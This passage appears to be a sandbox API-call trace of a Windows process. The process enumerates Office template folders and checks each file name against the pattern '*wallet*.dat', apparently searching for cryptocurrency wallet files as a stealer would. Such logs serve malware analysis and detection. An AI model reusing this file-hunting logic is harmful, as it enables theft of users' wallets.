ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97707caf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41a6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328908[[fn=Circle Process]].glox", cAlternateFileName="TM0332~1.GLO")) returned 1 [0234.793] PathMatchSpecA (pszFile="TM03328908[[fn=Circle Process]].glox", pszSpec="*wallet*.dat") returned 0 [0234.793] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x97706a49, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97706a49, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97707caf, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x41a6, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.794] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de9b8d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97de9b8d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97deae93, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328916[[fn=Converging Text]].glox", cAlternateFileName="TMF131~1.GLO")) returned 1 [0234.794] PathMatchSpecA (pszFile="TM03328916[[fn=Converging Text]].glox", pszSpec="*wallet*.dat") returned 0 [0234.794] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x97de9b8d, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97de9b8d, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97deae93, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2c74, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.794] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98433dab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98433dab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98435131, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328919[[fn=Hexagon Radial]].glox", cAlternateFileName="TM6EE1~1.GLO")) returned 1 [0234.794] PathMatchSpecA (pszFile="TM03328919[[fn=Hexagon Radial]].glox", pszSpec="*wallet*.dat") returned 0 [0234.794] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98433dab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98433dab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98435131, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1788, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.794] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403091, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98403091, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98404408, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23e7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328925[[fn=Interconnected Block Process]].glox", cAlternateFileName="TM5FE4~1.GLO")) returned 1 [0234.794] PathMatchSpecA (pszFile="TM03328925[[fn=Interconnected Block Process]].glox", pszSpec="*wallet*.dat") returned 0 [0234.795] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98403091, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98403091, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98404408, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x23e7, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.795] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984400fa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984400fa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x984400fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328932[[fn=Picture Frame]].glox", cAlternateFileName="TMD322~1.GLO")) returned 1 [0234.795] PathMatchSpecA (pszFile="TM03328932[[fn=Picture Frame]].glox", pszSpec="*wallet*.dat") returned 0 [0234.795] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x984400fa, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984400fa, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x984400fa, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x10e6, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.795] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980f6e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980f6e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980f6e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328935[[fn=Picture Organization Chart]].glox", cAlternateFileName="TMB8BB~1.GLO")) returned 1 [0234.795] PathMatchSpecA (pszFile="TM03328935[[fn=Picture Organization Chart]].glox", pszSpec="*wallet*.dat") returned 0 [0234.795] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x980f6e44, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980f6e44, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980f6e44, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1cca, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.796] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9824557b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9824557b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9824557b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15dc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328940[[fn=Radial Picture List]].glox", cAlternateFileName="TMC309~1.GLO")) returned 1 [0234.796] PathMatchSpecA (pszFile="TM03328940[[fn=Radial Picture List]].glox", pszSpec="*wallet*.dat") returned 0 [0234.796] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9824557b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9824557b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9824557b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x15dc, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.796] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978020a2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978020a2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x978034d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328951[[fn=Tabbed Arc]].glox", cAlternateFileName="TM0332~3.GLO")) returned 1 [0234.796] PathMatchSpecA (pszFile="TM03328951[[fn=Tabbed Arc]].glox", pszSpec="*wallet*.dat") returned 0 [0234.796] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x978020a2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978020a2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x978034d1, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe63, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.796] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983aecac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983aecac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983affea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328972[[fn=Tab List]].glox", cAlternateFileName="TM2A4A~1.GLO")) returned 1 [0234.796] PathMatchSpecA (pszFile="TM03328972[[fn=Tab List]].glox", pszSpec="*wallet*.dat") returned 0 [0234.796] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x983aecac, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983aecac, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983affea, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1318, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.797] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983bfdac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983bfdac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983bfdac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328975[[fn=Theme Picture Accent]].glox", cAlternateFileName="TM8247~1.GLO")) returned 1 [0234.797] PathMatchSpecA (pszFile="TM03328975[[fn=Theme Picture Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0234.797] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x983bfdac, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983bfdac, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983bfdac, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1930, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.797] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c45cf1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c45cf1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c47043, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328983[[fn=Theme Picture Alternating Accent]].glox", cAlternateFileName="TM8366~1.GLO")) returned 1 [0234.797] PathMatchSpecA (pszFile="TM03328983[[fn=Theme Picture Alternating Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0234.797] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98c45cf1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98c45cf1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98c47043, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x15fe, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.797] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9879b688, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9879b688, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9879b688, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1831, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328986[[fn=Theme Picture Grid]].glox", cAlternateFileName="TM02CE~1.GLO")) returned 1 [0234.798] PathMatchSpecA (pszFile="TM03328986[[fn=Theme Picture Grid]].glox", pszSpec="*wallet*.dat") returned 0 [0234.798] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9879b688, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9879b688, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9879b688, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1831, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.798] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ad5311, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ad5311, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98ad5311, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328990[[fn=Varying Width List]].glox", cAlternateFileName="TM6E5C~1.GLO")) returned 1 [0234.798] PathMatchSpecA (pszFile="TM03328990[[fn=Varying Width List]].glox", pszSpec="*wallet*.dat") returned 0 [0234.798] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98ad5311, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98ad5311, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98ad5311, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xc03, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.798] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 1 [0234.798] PathMatchSpecA (pszFile="TM03328998[[fn=Rings]].glox", pszSpec="*wallet*.dat") returned 0 [0234.798] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98913495, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98913495, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98913495, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x141f, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.799] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 0 [0234.799] FindClose (in: hFindFile=0x6e1aa0 | out: hFindFile=0x6e1aa0) returned 1 [0234.800] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x4, cFileName="1033", cAlternateFileName="")) returned 0 [0234.800] FindClose (in: hFindFile=0x6e1ba0 | out: hFindFile=0x6e1ba0) returned 1 [0234.800] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x9477a, cFileName="Word Document Bibliography Styles", cAlternateFileName="WORDDO~2")) returned 1 [0234.800] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0234.800] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1b20 [0234.819] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.820] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9763f96c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9763f96c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9764341c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x515ca, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851216[[fn=apasixtheditionofficeonline]].xsl", cAlternateFileName="TM0285~2.XSL")) returned 1 [0234.820] PathMatchSpecA (pszFile="TM02851216[[fn=apasixtheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.820] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851216[[fn=apasixtheditionofficeonline]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x9763f96c, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9763f96c, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9764341c, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x515ca, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.820] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9779cbce, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9779cbce, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9779f2aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486d2, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851217[[fn=chicago]].xsl", cAlternateFileName="TM0285~4.XSL")) returned 1 [0234.820] PathMatchSpecA (pszFile="TM02851217[[fn=chicago]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.820] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851217[[fn=chicago]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x9779cbce, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9779cbce, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9779f2aa, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x486d2, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.821] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97625f0b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97625f0b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9762869a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4181d, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851218[[fn=gb]].xsl", cAlternateFileName="TM0285~1.XSL")) returned 1 